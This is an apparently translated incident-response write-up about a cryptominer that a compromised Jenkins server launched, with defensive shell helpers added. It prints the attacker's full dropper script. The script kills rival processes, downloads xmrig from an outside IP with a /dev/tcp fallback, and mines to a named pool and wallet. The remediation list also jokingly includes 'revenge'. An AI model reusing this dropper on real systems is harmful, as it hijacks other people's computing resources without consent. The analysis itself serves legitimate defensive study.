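Troubleshooting an Abnormal Process on Linux

- Users reported that the website was slow. A look at the server showed one process consuming a large share of its resources: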
    PID    USER  PR  NI   VIRT     RES   SHR   S  %CPU   %MEM  TIME+     COMMAND
    29575  root  10  -10  2951860  2.0g  1960  S  183.4  26.7  10943:12  trace
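The same check can be done non-interactively, for example from a cron job or over SSH. The following is a minimal sketch, not the method used in the original investigation: `high_cpu` is a hypothetical helper name and the 80% default threshold is arbitrary. Note that `ps` reports CPU usage averaged over the lifetime of the process, whereas `top` shows a recent sample, so the numbers will not match exactly.

```shell
#!/bin/bash
# Print processes whose %CPU exceeds a threshold.
# Input: a "PID %CPU %MEM COMMAND" listing on stdin (header line first).
# high_cpu is a hypothetical helper; the 80% default is only an illustration.
high_cpu() {
    local threshold="${1:-80}"
    # NR > 1 skips the header; "$2 + 0" forces a numeric comparison.
    awk -v t="$threshold" 'NR > 1 && ($2 + 0) > t { print $1, $2, $4 }'
}

# Usage (assumes the procps version of ps):
#   ps -eo pid,pcpu,pmem,comm --sort=-pcpu | high_cpu 80
```

Each output line contains the PID, the CPU percentage, and the command name of a process above the threshold.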
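- Find the process that is consuming the resources

Command:

    ps -f -p 29575

Result:

    [root@localhost ~]# ps -f -p 29575
    UID        PID  PPID  C STIME TTY          TIME CMD
    root     29575 29554 99 11月24 ?       7-12:44:20 ./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 100 --cpu-priority 3 --print-time 25 --threads 2 --url auto.c3pool.org:13333 --user 83dxgsjgbnM

The arguments alone show that this process is up to no good: it is allowed to use 100% of the CPU and reports to a remote pool address (auto.c3pool.org:13333).

    --max-cpu-usage 100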
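The "look at the arguments" step can be turned into a rough heuristic. The sketch below checks a command line for a few of the flags seen above. `looks_like_miner` is a hypothetical helper, and the pattern list is taken only from this incident, so it is illustrative rather than exhaustive. A renamed or recompiled miner could easily evade it.

```shell
#!/bin/bash
# Heuristic: does a command line contain options seen on the miner in this incident?
# looks_like_miner is a hypothetical helper; the pattern list is illustrative only.
looks_like_miner() {
    local cmdline="$1"
    local pattern
    for pattern in '--donate-level' '--max-cpu-usage' '--cpu-priority' 'c3pool'; do
        case "$cmdline" in
            *"$pattern"*) return 0 ;;   # at least one indicator found
        esac
    done
    return 1                            # no indicator found
}

# Usage (Linux /proc assumed; cmdline is NUL-separated, so convert to spaces):
#   looks_like_miner "$(tr '\0' ' ' < /proc/29575/cmdline)" && echo "suspicious"
```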
- Find the parent process

Command:

    ps -f -p 29554

Result:

    [root@localhost ~]# ps -f -p 29554
    UID        PID  PPID  C STIME TTY          TIME CMD
    root     29554 32494  0 11月24 ?       00:00:00 /bin/bash /tmp/jenkins1137544342535481679.sh
    [root@localhost ~]# ps -f -p 32494
    UID        PID  PPID  C STIME TTY          TIME CMD
    root     32494     1  0 11月24 ?       00:19:04 java -jar /usr/local/jenkins.war --httpPort=8083

So trace was started by a shell script in /tmp, and that script was started by Jenkins.
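Following the PPID column by hand works, but the walk up the process tree can also be scripted. This is a minimal sketch that assumes a Linux /proc filesystem; `ancestry` is a hypothetical helper name. It reads the parent PID from /proc/PID/status instead of calling `ps` repeatedly.

```shell
#!/bin/bash
# Print a process and each of its ancestors, one "PID COMMAND" line per level.
# Assumes a Linux /proc filesystem; ancestry is a hypothetical helper name.
ancestry() {
    local pid="$1" ppid cmd key val
    while [ -n "$pid" ] && [ "$pid" -gt 0 ] && [ -r "/proc/$pid/status" ]; do
        # cmdline is NUL-separated; turn the separators into spaces for display.
        cmd=$(tr '\0' ' ' 2>/dev/null < "/proc/$pid/cmdline")
        printf '%s %s\n' "$pid" "$cmd"
        # The PPid field in /proc/PID/status holds the parent PID.
        ppid=""
        while read -r key val; do
            if [ "$key" = "PPid:" ]; then
                ppid="$val"
                break
            fi
        done < "/proc/$pid/status"
        pid="$ppid"
    done
}

# Usage:
#   ancestry 29575
```

For the incident above, one would expect the chain to run from trace through the /tmp shell script and the Jenkins java process up to PID 1.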
- Examine the script

    cat /tmp/jenkins1137544342535481679.sh

    #!/bin/bash
    ps aux | grep -v grep | grep -v "java\|redis\|weblogic\|mongod\|mysql\|oracle\|b52e75408\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh"| awk "{if($3>60.0) print $2}" | xargs -I % kill -9 %
    if [[ $(whoami) != "root" ]]; then
        for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do
            kill -9 $tr || : ;
        done;
    fi
    threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
    hostHash=$(hostname -f | md5sum | cut -c1-8);
    echo "${hostHash} - ${threadCount}";
    _curl () {
      read proto server path <<<$(echo ${1//// })
      DOC=/${path// //}
      HOST=${server//:*}
      PORT=${server//*:}
      [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
      exec 3<>/dev/tcp/${HOST}/$PORT
      echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
      (while read line; do
       [[ "$line" == $'\r' ]] && break
      done && cat) <&3
      exec 3>&-
    }
    rm -rf config.json;
    d () {
      curl -L --insecure --connect-timeout 5 --max-time 40 --fail $1 -o $2 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 $1 -O $2 2> /dev/null || _curl $1 > $2;
    }
    test ! -s trace && \
        d http://118.189.172.141:8080/novoCRM/static/xmrig-6.4.0-linux-x64.tar.gz trace.tgz && \
        tar -zxvf trace.tgz && \
        mv xmrig-6.4.0/xmrig trace && \
        rm -rf xmrig-6.4.0 && \
        rm -rf trace.tgz;
    test ! -x trace && chmod +x trace;
    k() {
        ./trace \
            -r 2 \
            -R 2 \
            --keepalive \
            --no-color \
            --donate-level 1 \
            --max-cpu-usage 100 \
            --cpu-priority 3 \
            --print-time 25 \
            --threads ${threadCount:-4} \
            --url $1 \
            --user 83dxgsjgbnMN7Ej6GfCZMsfHYD3NYdozAhm7DjyTme6jTYPaJ8AQeEyMGKLRL1LjqXVSVBJgU3moYUECZjWUAkTi8rxSNZW \
            --pass elf2 \
            --keepalive
    }
    k auto.c3pool.org:13333

In short, the script kills other CPU-heavy processes that are not on its exclusion list, downloads xmrig 6.4.0 from 118.189.172.141:8080, renames the binary to trace, and starts it against auto.c3pool.org:13333.
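When reading a script like this, it helps to pull out the network endpoints it contacts so they can be blocked or searched for in logs. The sketch below does that with two deliberately loose regular expressions. `extract_indicators` is a hypothetical helper, and its patterns will miss obfuscated or dynamically built addresses.

```shell
#!/bin/bash
# Pull URLs and host:port pairs out of a suspicious script.
# extract_indicators is a hypothetical helper; the regexes are deliberately loose.
extract_indicators() {
    local file="$1"
    {
        # http/https URLs, up to the next whitespace character
        grep -Eo 'https?://[^[:space:]]+' "$file"
        # bare hostname:port pairs, such as a pool address
        grep -Eo '[A-Za-z0-9.-]+\.[A-Za-z]{2,}:[0-9]{2,5}' "$file"
    } | sort -u
}

# Usage:
#   extract_indicators /tmp/jenkins1137544342535481679.sh
```

The output is a de-duplicated list, one indicator per line, which can be fed into a firewall rule set or a log search.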
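- The core of the script is the trace command (the renamed xmrig binary); it is the culprit consuming the server's resources. Running

    lsof -p 29554

shows the directory it lives in: /root/.jenkins/workspace/UpdateJenkins
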
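If `lsof` is not installed, the working directory and executable path of a process can usually be read straight from /proc. This is a minimal sketch assuming Linux and sufficient privileges to read the target's /proc entries; `proc_location` is a hypothetical helper name.

```shell
#!/bin/bash
# Show where a process is running from, using the /proc symlinks.
# Assumes Linux /proc and permission to read the target's entries.
# proc_location is a hypothetical helper name.
proc_location() {
    local pid="$1"
    # cwd points at the current working directory of the process.
    printf 'cwd: %s\n' "$(readlink "/proc/$pid/cwd")"
    # exe points at the binary; the kernel appends " (deleted)" if it was removed from disk.
    printf 'exe: %s\n' "$(readlink "/proc/$pid/exe")"
}

# Usage:
#   proc_location 29575
```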
Remediation:
- Stop the process and delete the malicious script /tmp/jenkins1137544342535481679.sh
- Download a fresh jenkins.war from the official site
- Keep monitoring
- revenge
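
For the "fresh jenkins.war" step, it is worth checking the download against a published digest before deploying it. The sketch below assumes a SHA-256 value is available from the official download page. `verify_sha256` is a hypothetical helper, and the digest in the usage comment is a placeholder, not a real value.

```shell
#!/bin/bash
# Compare a file's SHA-256 digest with an expected value.
# verify_sha256 is a hypothetical helper; the expected digest must be copied
# from the official download page (lowercase hex, as printed by sha256sum).
verify_sha256() {
    local file="$1" expected="$2" actual
    actual=$(sha256sum "$file" | cut -d' ' -f1)
    # Succeeds (exit status 0) only when the digests are identical.
    [ -n "$actual" ] && [ "$actual" = "$expected" ]
}

# Usage (EXPECTED_DIGEST is a placeholder):
#   verify_sha256 /usr/local/jenkins.war "EXPECTED_DIGEST" && echo "checksum OK"
```

A mismatch means the file should not be deployed until the discrepancy is explained.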